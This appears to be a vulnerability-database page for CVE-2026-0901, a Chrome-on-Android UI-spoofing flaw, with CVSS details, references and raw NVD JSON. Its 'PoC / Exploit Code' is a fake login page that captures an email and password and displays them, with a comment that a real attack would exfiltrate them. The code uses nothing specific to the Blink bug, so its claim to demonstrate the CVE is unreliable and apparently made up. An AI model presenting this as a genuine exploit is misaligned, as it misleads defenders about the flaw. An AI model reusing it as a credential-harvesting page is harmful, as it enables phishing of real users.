Security Vulnerability Report
CVE-2026-0901 CVSS 5.4 MEDIUM

CVE-2026-0901

Published: 2026-01-20 05:16:16
Last Modified: 2026-01-30 16:28:26

Description

Inappropriate implementation in Blink in Google Chrome on Android prior to 144.0.7559.59 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome on Android < 144.0.7559.59

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-0901 PoC: UI Spoofing in Google Chrome on Android -->
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>UI Spoofing PoC - CVE-2026-0901</title>
  <style>
    * { margin: 0; padding: 0; box-sizing: border-box; }
    body {
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
      background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
      min-height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
      padding: 20px;
    }
    .spoofed-interface {
      background: white;
      border-radius: 20px;
      padding: 40px;
      max-width: 400px;
      width: 100%;
      box-shadow: 0 20px 60px rgba(0,0,0,0.3);
    }
    .header {
      background: #4285f4;
      color: white;
      padding: 15px 20px;
      margin: -40px -40px 20px -40px;
      border-radius: 20px 20px 0 0;
      font-weight: bold;
      font-size: 18px;
    }
    .input-group { margin-bottom: 20px; }
    .input-group label {
      display: block;
      margin-bottom: 8px;
      color: #333;
      font-weight: 500;
    }
    .input-group input {
      width: 100%;
      padding: 12px;
      border: 2px solid #e0e0e0;
      border-radius: 10px;
      font-size: 16px;
      transition: border-color 0.3s;
    }
    .input-group input:focus { outline: none; border-color: #4285f4; }
    .submit-btn {
      width: 100%;
      padding: 15px;
      background: #4285f4;
      color: white;
      border: none;
      border-radius: 10px;
      font-size: 18px;
      font-weight: bold;
      cursor: pointer;
      transition: background 0.3s;
    }
    .submit-btn:hover { background: #3367d6; }
    .warning {
      background: #fff3cd;
      border: 1px solid #ffc107;
      color: #856404;
      padding: 15px;
      border-radius: 10px;
      margin-top: 20px;
      font-size: 14px;
    }
    .hidden-malicious {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0,0,0,0.8);
      justify-content: center;
      align-items: center;
      z-index: 9999;
    }
    .malicious-content {
      background: white;
      padding: 30px;
      border-radius: 15px;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="spoofed-interface">
    <div class="header">🔐 Secure Login Portal</div>
    <h2 style="margin-bottom: 20px; color: #333;">Welcome Back</h2>
    <form id="loginForm">
      <div class="input-group">
        <label for="email">Email Address</label>
        <input type="email" id="email" name="email" placeholder="Enter your email" required>
      </div>
      <div class="input-group">
        <label for="password">Password</label>
        <input type="password" id="password" name="password" placeholder="Enter your password" required>
      </div>
      <button type="submit" class="submit-btn">Sign In</button>
    </form>
    <div class="warning">
      ⚠️ This is a demonstration of a UI spoofing vulnerability (CVE-2026-0901). In a real attack, this interface could be used to steal credentials.
    </div>
  </div>
  <div class="hidden-malicious" id="maliciousOverlay">
    <div class="malicious-content">
      <h3>⚠️ Credentials Captured!</h3>
      <p id="capturedData"></p>
    </div>
  </div>
  <script>
    document.getElementById('loginForm').addEventListener('submit', function(e) {
      e.preventDefault();
      const email = document.getElementById('email').value;
      const password = document.getElementById('password').value;
      // Display captured credentials (in a real attack, these would be exfiltrated).
      // Rendered as text nodes rather than via innerHTML so that the form input
      // cannot inject markup into the demo page itself.
      const out = document.getElementById('capturedData');
      out.textContent = 'Email: ' + email;
      out.appendChild(document.createElement('br'));
      out.appendChild(document.createTextNode('Password: ' + password));
      document.getElementById('maliciousOverlay').style.display = 'flex';
      console.log('CVE-2026-0901 PoC - UI Spoofing demonstration');
      console.log('Captured credentials:', { email: email, password: password });
    });
  </script>
</body>
</html>

References

https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html (Release Notes, Vendor Advisory)
https://issues.chromium.org/issues/40057499 (Issue Tracking, Permissions Required)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0901",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T05:16:15.510",
    "lastModified": "2026-01-30T16:28:25.950",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Inappropriate implementation in Blink in Google Chrome on Android prior to 144.0.7559.59 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High)"},
      {"lang": "es", "value": "Implementación inapropiada en Blink en Google Chrome en Android anterior a 144.0.7559.59 permitió a un atacante remoto realizar suplantación de UI mediante una página HTML manipulada. (Gravedad de seguridad de Chromium: Alta)"}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-451"}]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0.7559.59", "matchCriteriaId": "7322229C-61DF-4A91-9816-F7796F9AABCD"}
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"},
              {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"},
              {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]},
      {"url": "https://issues.chromium.org/issues/40057499", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}
    ]
  }
}